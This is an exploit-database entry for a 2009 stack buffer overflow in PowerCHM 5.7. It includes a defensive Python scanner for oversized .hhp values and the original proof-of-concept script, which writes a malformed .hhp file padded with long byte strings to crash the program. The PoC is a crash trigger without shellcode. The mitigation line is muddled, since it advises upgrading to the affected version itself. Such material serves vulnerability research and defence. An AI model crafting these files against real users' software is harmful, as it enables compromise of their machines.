Vendor: PowerCHM
By: Encrypt3d.M!nd
CVSS: 9.3 (HIGH)
CWE: 119 (Stack overflow)
Product Name: PowerCHM
Affected Version From: 5.7
Affected Version To: 5.7
Patch Exists: YES
Related CWE: N/A
CPE: a:powerchm:powerchm:5.7
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
Published: 2009

PowerCHM 5.7 (hhp file) Stack overflow PoC

PowerCHM 5.7 is vulnerable to a stack-based buffer overflow when a specially crafted .hhp (HTML Help project) file is opened. The vulnerability is caused by a boundary error when handling the 'Title' field of the .hhp file, which can be triggered with an overly long string.
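As an added example (not part of the advisory or of the PoC below), a small defensive scanner that parses the INI-style .hhp layout and flags any entry whose key or value exceeds a length threshold, which is how the overlong 'Title' string described above would present. MAX_VALUE_LEN, the helper names and the sample project files are constructed assumptions, not limits documented by PowerCHM.

```python
import re

# Assumed threshold: well above any legitimate title, well below the
# multi-hundred-byte strings a crafted file would carry.
MAX_VALUE_LEN = 256


def parse_hhp(text):
    """Parse an INI-style .hhp document into {SECTION: [(key, value), ...]}.
    Lines without '=' (as in [FILES] lists) are kept as a key with an empty value."""
    sections = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(';'):
            continue
        m = re.match(r'^\[(.+)\]$', line)
        if m:
            current = m.group(1).upper()
            sections.setdefault(current, [])
            continue
        if current is None:
            continue  # ignore content before the first section header
        key, sep, value = line.partition('=')
        sections[current].append((key.strip(), value.strip() if sep else ''))
    return sections


def find_oversized(text, limit=MAX_VALUE_LEN):
    """Return (section, key prefix, length) for each entry exceeding limit."""
    hits = []
    for section, pairs in parse_hhp(text).items():
        for key, value in pairs:
            length = max(len(key), len(value))
            if length > limit:
                hits.append((section, key[:16], length))
    return hits


# Constructed samples (not real project files).
BENIGN = "[OPTIONS]\nCompatibility=1.1 or later\nTitle=Example Help\n\n[FILES]\nindex.htm\n"
LONG_TITLE = "[OPTIONS]\nTitle=" + "A" * 999 + "\n\n[FILES]\n"
TRAILING_JUNK = "[OPTIONS]\nTitle=ok\n\n[INFOTYPES]\n" + "X" * 1500 + "\n"

if __name__ == "__main__":
    for name, sample in [("benign", BENIGN), ("long title", LONG_TITLE), ("trailing junk", TRAILING_JUNK)]:
        print(name, find_oversized(sample))
```

Run it against a quarantined .hhp before it reaches the compiler; anything reported is a file to inspect, not open.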

Mitigation:

Upgrade to the latest version of PowerCHM 5.7

Exploit-DB raw data:

# exploit.py
# PowerCHM 5.7 (hhp file) Stack overflow PoC
# By: Encrypt3d.M!nd
#
# Originally discovered by:
# Biks Security (http://security.biks.vn/?p=365)
#

# Minimal HTML Help project (.hhp) skeleton; the overly long string that
# triggers the overflow is appended after it.
header = (
    "[OPTIONS]\n"
    "Compatibility=1.1 or later\n"
    "Compiled file=bratax.chm\n"
    "Contents file=aaaaaa.hhc\n"
    "Index file=aaaaaa.hhk\n"
    "Language=0x813 Dutch (Belgium)\n"
    "Title=\n"
    "Error log file=Errlog.txt\n"
    "Default Window=main\n\n"
    "[WINDOWS]\n"
    'main="","aaaaaa.hhc","aaaaaa.hhk","","",,,,,0x41520,240,0x184E,[262,184,762,584],,,,0,0,0,0\n\n'
    "[FILES]\n\n"
    "[INFOTYPES]\n")

# 999 'A' bytes, a 4-byte 'BBBB' marker, then 500 'C' bytes of padding
with open('poc.hhp', 'w') as f:
    f.write(header + "\x41" * 999 + "\x42\x42\x42\x42" + "\x43" * 500)

# milw0rm.com [2009-03-27]